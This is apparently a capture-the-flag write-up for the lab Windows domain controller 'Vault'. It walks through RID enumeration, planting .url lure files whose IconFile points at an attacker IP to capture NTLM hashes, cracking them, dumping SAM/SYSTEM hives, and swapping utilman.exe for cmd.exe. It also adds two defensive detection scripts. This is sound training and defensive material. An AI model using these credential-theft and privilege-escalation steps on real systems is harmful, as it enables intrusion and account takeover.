# Vault

`rid` `ntlm` `SeRestorePrivilege`

* Machine name: Vault
* Difficulty: Hard
* OS: Windows

## Enumeration

### NMAP

```
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-10-02 11:05:07Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2024-10-02T11:06:35+00:00; +1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: VAULT
|   NetBIOS_Domain_Name: VAULT
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: vault.offsec
|   DNS_Computer_Name: DC.vault.offsec
|   DNS_Tree_Name: vault.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-10-02T11:05:55+00:00
| ssl-cert: Subject: commonName=DC.vault.offsec
| Issuer: commonName=DC.vault.offsec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-01T02:09:28
| Not valid after:  2025-01-31T02:09:28
| MD5:   6cb2:aab3:f717:80bf:6165:7dcc:4fca:92a3
| SHA-1: f155:3524:94c5:522d:0300:245a:53fa:7b13:e8ae:e219
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49675/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         syn-ack Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack Microsoft Windows RPC
49708/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 43470/tcp): CLEAN (Timeout)
|   Check 2 (port 16135/tcp): CLEAN (Timeout)
|   Check 3 (port 47107/udp): CLEAN (Timeout)
|   Check 4 (port 8957/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-02T11:05:59
|_  start_date: N/A
```

/etc/hosts entry: vault.offsec

### SMB

We have access to an SMB share, but the folder is empty. We will brute-force the RIDs to enumerate domain accounts.

```
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb vault.offsec -u guest -p '' --rid-brut
SMB         vault.offsec    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB         vault.offsec    445    DC               [+] vault.offsec\guest: 
SMB         vault.offsec    445    DC               [+] Brute forcing RIDs
SMB         vault.offsec    445    DC               498: VAULT\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         vault.offsec    445    DC               500: VAULT\Administrator (SidTypeUser)
SMB         vault.offsec    445    DC               501: VAULT\Guest (SidTypeUser)
SMB         vault.offsec    445    DC               502: VAULT\krbtgt (SidTypeUser)
SMB         vault.offsec    445    DC               512: VAULT\Domain Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               513: VAULT\Domain Users (SidTypeGroup)
SMB         vault.offsec    445    DC               514: VAULT\Domain Guests (SidTypeGroup)
SMB         vault.offsec    445    DC               515: VAULT\Domain Computers (SidTypeGroup)
SMB         vault.offsec    445    DC               516: VAULT\Domain Controllers (SidTypeGroup)
SMB         vault.offsec    445    DC               517: VAULT\Cert Publishers (SidTypeAlias)
SMB         vault.offsec    445    DC               518: VAULT\Schema Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               519: VAULT\Enterprise Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               520: VAULT\Group Policy Creator Owners (SidTypeGroup)
SMB         vault.offsec    445    DC               521: VAULT\Read-only Domain Controllers (SidTypeGroup)
SMB         vault.offsec    445    DC               522: VAULT\Cloneable Domain Controllers (SidTypeGroup)
SMB         vault.offsec    445    DC               525: VAULT\Protected Users (SidTypeGroup)
SMB         vault.offsec    445    DC               526: VAULT\Key Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               527: VAULT\Enterprise Key Admins (SidTypeGroup)
SMB         vault.offsec    445    DC               553: VAULT\RAS and IAS Servers (SidTypeAlias)
SMB         vault.offsec    445    DC               571: VAULT\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         vault.offsec    445    DC               572: VAULT\Denied RODC Password Replication Group (SidTypeAlias)
SMB         vault.offsec    445    DC               1000: VAULT\DC$ (SidTypeUser)
SMB         vault.offsec    445    DC               1101: VAULT\DnsAdmins (SidTypeAlias)
SMB         vault.offsec    445    DC               1102: VAULT\DnsUpdateProxy (SidTypeGroup)
SMB         vault.offsec    445    DC               1103: VAULT\anirudh (SidTypeUser)
```

anirudh is a username. We tried to brute-force his password with kerbrute, without success. We will try to steal his NTLM hash instead.

{% embed url="https://github.com/Greenwolf/ntlm_theft" %}

## Initial access

```
┌──(kali㉿kali)-[~/ntlm_theft]
└─$ python3 ntlm_theft.py -g url -s 192.168.45.181 -f vault
Created: vault/vault-(url).url (BROWSE TO FOLDER)
Created: vault/vault-(icon).url (BROWSE TO FOLDER)
Generation Complete.                                                                   
┌──(kali㉿kali)-[~/ntlm_theft]
└─$ cd vault                                           
                                               
┌──(kali㉿kali)-[~/ntlm_theft/vault]
└─$ ls
'vault-(icon).url'  'vault-(url).url'                                                                       
┌──(kali㉿kali)-[~/ntlm_theft/vault]
└─$ cat *                                                  
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.45.181\%USERNAME%.icon
IconIndex=1[InternetShortcut]
URL=file://192.168.45.181/leak/leak.html 

┌──(kali㉿kali)-[~/ntlm_theft/vault]
└─$ smbclient //192.168.190.172/DocumentsShare             
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put vault-(icon).url
putting file vault-(icon).url as \vault-(icon).url (1.2 kb/s) (average 1.2 kb/s)
```

We start Responder to capture the hash when the lure file is opened from the share:

```
┌──(kali㉿kali)-[~/oscp]
└─$ sudo responder -I tun0
{...}
[SMB] NTLMv2-SSP Client   : 192.168.190.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash     : anirudh::VAULT:6f385e19f1a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
```
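The lure above works because Explorer resolves the `IconFile`/`URL` UNC path and authenticates with NTLM as soon as the folder is listed. The following scanner, an added example that is not part of ntlm_theft or of this writeup, hunts a mounted share for `.url` files that point at an untrusted host; `TRUSTED_HOSTS` is a placeholder allow-list.

```python
"""Hunt for .url lure files that cause outbound NTLM authentication.
Added example for this writeup, not code from ntlm_theft or the original post. A .url whose
IconFile or URL points at a UNC host makes Explorer fetch the icon, and so authenticate with
NTLM, as soon as the folder is opened. TRUSTED_HOSTS is a placeholder allow-list."""
import re
from pathlib import Path

TRUSTED_HOSTS = {"dc.vault.offsec"}  # placeholder: hosts allowed to serve icons/links
# \\host\..., //host/... or file://host/...; a drive letter (file:///C:/...) is not a host
UNC_RE = re.compile(r"^(?:\\\\|//|file://+)(?![a-z]:)(?P<host>[^\\/]+)", re.IGNORECASE)
WATCHED_KEYS = ("iconfile", "url", "workingdirectory")

def parse_url_file(text):
    """Return (key, value) pairs from every [InternetShortcut] section in `text`.
    Hand-rolled: configparser would trip on '%USERNAME%' (interpolation) and on a
    lure that stacks several sections in one file."""
    pairs, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            pairs.append((key.strip().lower(), value.strip()))
    return pairs

def remote_refs(text):
    """Return (key, host) for each watched key whose value points at an untrusted UNC host."""
    hits = []
    for key, value in parse_url_file(text):
        m = UNC_RE.match(value) if key in WATCHED_KEYS else None
        if m and m.group("host").lower() not in TRUSTED_HOSTS:
            hits.append((key, m.group("host")))
    return hits

def scan_share(root):
    """Walk a locally mounted copy of a share; map each suspicious .url path to its hits."""
    findings = {}
    for path in Path(root).rglob("*.url"):
        hits = remote_refs(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings

# Constructed sample mirroring the two lures above, concatenated as `cat *` printed them
# (the IconIndex line runs straight into the next file's section header).
SAMPLE = ("[InternetShortcut]\nURL=whatever\nWorkingDirectory=whatever\n"
          "IconFile=\\\\192.168.45.181\\%USERNAME%.icon\nIconIndex=1[InternetShortcut]\n"
          "URL=file://192.168.45.181/leak/leak.html\n")

if __name__ == "__main__":
    for key, host in remote_refs(SAMPLE):
        print(f"{key} -> {host}")  # iconfile -> 192.168.45.181, url -> 192.168.45.181
```

Run `scan_share("/mnt/DocumentsShare")` against a mount of the share to list every lure file and the host it would authenticate to.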

We crack the captured NTLMv2 hash with hashcat (mode 5600):

```
┌──(kali㉿kali)-[~/oscp/vault]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

{...}
ANIRUDH::VAULT:6f385e19f1a45653:cff7b2468a10bcfd658482db4266e7f5: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:SecureHM
```

We could also have found it with kerbrute, as mentioned earlier, but that would have taken far too long:

```
┌──(kali㉿kali)-[~/oscp/vault]
└─$ grep -n SecureHM /usr/share/wordlists/rockyou.txt
10608878:SecureHM
```

```
┌──(kali㉿kali)-[~/oscp/vault]
└─$ evil-winrm -u anirudh -p SecureHM -i vault.offsec
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> whoami
vault\anirudh
```

## Privilege escalation

```
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled
```

`SeBackupPrivilege`

{% embed url="https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/" %}

```
*Evil-WinRM* PS C:\Users\anirudh\desktop> cd c:\
*Evil-WinRM* PS C:\> mkdir Temp


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        10/2/2024   5:03 AM                Temp


*Evil-WinRM* PS C:\> reg save hklm\sam c:\Temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\> reg save hklm\system c:\Temp\system
The operation completed successfully.

*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> dir


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/2/2024   5:03 AM          49152 sam
-a----        10/2/2024   5:03 AM       16498688 system


*Evil-WinRM* PS C:\Temp> download sam
Info: Downloading C:\Temp\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Downloading C:\Temp\system to system         
Info: Download successful!
```

```
┌──(kali㉿kali)-[~/oscp/vault]
└─$ impacket-secretsdump -sam sam -system system LOCAL 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
```
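From the defender's side, the chain above leaves two clear traces: a 4672 event listing SeBackupPrivilege/SeRestorePrivilege for a logon of an account that should not hold them, and a 4688 process creation for `reg save` of the SAM and SYSTEM hives. The detection below is an added example, not from this writeup or any tool it uses; it runs over constructed, simplified event lines, and `ADMIN_BASELINE` is a placeholder list of accounts expected to hold those rights.

```python
"""Flag SeBackup/SeRestore use by unexpected accounts and SAM/SYSTEM hive dumps.
Added example for this writeup, not from the original post or any tool it uses. It runs
over constructed, simplified Security event lines: 4672 (special privileges assigned to
a new logon) carries Privileges, 4688 (process creation) carries CommandLine, which is
only populated when "Include command line in process creation events" is enabled.
ADMIN_BASELINE is a placeholder list of accounts expected to hold these rights."""
import re

ADMIN_BASELINE = {"administrator", "dc$"}  # placeholder: accounts allowed these privileges
SENSITIVE_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}
# reg save of the SAM, SYSTEM or SECURITY hive, the combination secretsdump needs
HIVE_DUMP_RE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line):
    """Turn 'EventID=4672 SubjectUserName=anirudh Field="quoted value"' into a dict."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}

def detect(lines):
    """Return (rule, account, detail) alerts for the two behaviours described above."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        user = ev.get("SubjectUserName", "").lower()
        if ev.get("EventID") == "4672":
            held = set(ev.get("Privileges", "").split(",")) & SENSITIVE_PRIVS
            if held and user not in ADMIN_BASELINE:
                alerts.append(("backup-privs-non-admin", user, ",".join(sorted(held))))
        elif ev.get("EventID") == "4688":
            m = HIVE_DUMP_RE.search(ev.get("CommandLine", ""))
            if m:
                alerts.append(("hive-dump", user, m.group(1).lower()))
    return alerts

# Constructed sample: the real 4672 event lists privileges one per line; they are
# joined with commas here to keep each event on a single line.
SAMPLE_LOG = [
    'EventID=4672 SubjectUserName=anirudh Privileges=SeBackupPrivilege,SeRestorePrivilege,SeShutdownPrivilege',
    'EventID=4672 SubjectUserName=Administrator Privileges=SeDebugPrivilege,SeBackupPrivilege',
    'EventID=4688 SubjectUserName=anirudh NewProcessName="C:\\Windows\\System32\\reg.exe" CommandLine="reg save hklm\\sam c:\\Temp\\sam"',
    'EventID=4688 SubjectUserName=anirudh NewProcessName="C:\\Windows\\System32\\reg.exe" CommandLine="reg save hklm\\system c:\\Temp\\system"',
    'EventID=4688 SubjectUserName=anirudh NewProcessName="C:\\Windows\\System32\\whoami.exe" CommandLine="whoami /priv"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)  # one backup-privs-non-admin alert, then hive-dump for sam and system
```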

We cannot log in with this hash (the account must be disabled; note also that on a domain controller the SAM hive holds only the local DSRM account, while domain accounts live in NTDS.dit). We will abuse SeRestorePrivilege instead:

```
*Evil-WinRM* PS C:\Users\anirudh\Documents> mv c:\windows\system32\utilman.exe c:\windows\system32\utilman.old
*Evil-WinRM* PS C:\Users\anirudh\Documents> mv c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe
```

To invoke utilman.exe: press Windows + U on the RDP logon screen (rdesktop).

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FSfjdsJgETeGIlQofTY5O%2Fc001d7ae043b38630009654d1d3d4b82.png?alt=media&#x26;token=639444d2-e5b2-404f-9efb-6d94d9ed5fae" alt=""><figcaption></figcaption></figure>
